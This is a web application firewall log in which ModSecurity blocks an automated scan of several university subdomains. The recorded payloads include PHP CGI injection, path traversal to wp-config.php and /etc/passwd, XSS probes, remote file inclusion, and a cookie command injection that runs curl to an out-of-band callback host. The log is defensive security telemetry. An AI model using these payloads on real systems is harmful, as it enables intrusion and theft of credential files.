[Tue Aug 29 11:41:26.363570 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc0NgQAAAAM"]
[Tue Aug 29 11:41:26.382926 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcbSGMAAAAv"]
[Tue Aug 29 11:41:26.384851 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcriisAAAAB"]
[Tue Aug 29 11:41:26.395049 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcoNWkAAAAF"]
[Tue Aug 29 11:41:26.395054 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAUKhF0AAABC"]
[Tue Aug 29 11:41:26.427748 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAaZ9tgAAAAo"]
[Tue Aug 29 11:41:26.508340 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcrii0AAAAB"]
[Tue Aug 29 11:41:26.543569 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAUKhGAAAABC"]
[Tue Aug 29 11:41:26.553140 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAc0NggAAAAM"]
[Tue Aug 29 11:41:26.567585 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcbSGUAAAAv"]
[Tue Aug 29 11:41:26.583767 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAc2dTMAAAAN"]
[Tue Aug 29 11:41:26.597608 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcbSGYAAAAv"]
[Tue Aug 29 11:41:26.644514 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAaZ9twAAAAo"]
[Tue Aug 29 11:41:26.656951 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAUKhGMAAABC"]
[Tue Aug 29 11:41:26.659962 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAc0NgsAAAAM"]
[Tue Aug 29 11:41:26.696515 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAQkBdMAAAAC"]
[Tue Aug 29 11:41:27.519197 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQkBdoAAAAC"]
[Tue Aug 29 11:41:27.570853 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO1298Co-f0AAAQSWo0AAAA0"]
[Tue Aug 29 11:41:27.602222 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1298Co-f0AAAUKhGgAAABC"]
[Tue Aug 29 11:41:27.606009 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcoNXUAAAAF"]
[Tue Aug 29 11:41:27.623172 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAUKhGkAAABC"]
[Tue Aug 29 11:41:27.628233 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAQkBd4AAAAC"]
[Tue Aug 29 11:41:27.693154 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcrijsAAAAB"]
[Tue Aug 29 11:41:28.362727 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26grm8ctmzwagnuw.oast.site found within TX:1: cjmnbitjmimt14dgn26grm8ctmzwagnuw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAYf-TsAAAAD"]
[Tue Aug 29 11:41:28.366051 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g869w7a8rkmmyp.oast.site found within TX:1: cjmnbitjmimt14dgn26g869w7a8rkmmyp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAc0NhAAAAAM"]
[Tue Aug 29 11:41:28.413504 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt8jht4irgnjyx.oast.site found within TX:1: cjmnbitjmimt14dgn26gt8jht4irgnjyx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAcrij4AAAAB"]
[Tue Aug 29 11:41:28.463646 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12@MCo-f0AAAcbSHAAAAAv"]
[Tue Aug 29 11:41:28.476727 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3kb6jo5r8bdtq.oast.site found within TX:1: cjmnbitjmimt14dgn26g3kb6jo5r8bdtq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAaZ9ukAAAAo"]
[Tue Aug 29 11:41:28.505346 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO12@MCo-f0AAAcbSHIAAAAv"]
[Tue Aug 29 11:41:28.558690 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26girh37asrmi3kw.oast.site found within TX:1: cjmnbitjmimt14dgn26girh37asrmi3kw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAc2dT4AAAAN"]
[Tue Aug 29 11:41:29.438311 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gmdo6tbupnperk.oast.site found within TX:1: cjmnbitjmimt14dgn26gmdo6tbupnperk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@cCo-f0AAAUKhHQAAABC"]
[Tue Aug 29 11:41:29.488248 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO12@cCo-f0AAAUKhHYAAABC"]
[Tue Aug 29 11:41:30.379586 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26g4idz3ocr3axbp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcoNYQAAAAF"]
[Tue Aug 29 11:41:30.379982 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26gfkqyb5kcgqpge.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAQkBe0AAAAC"]
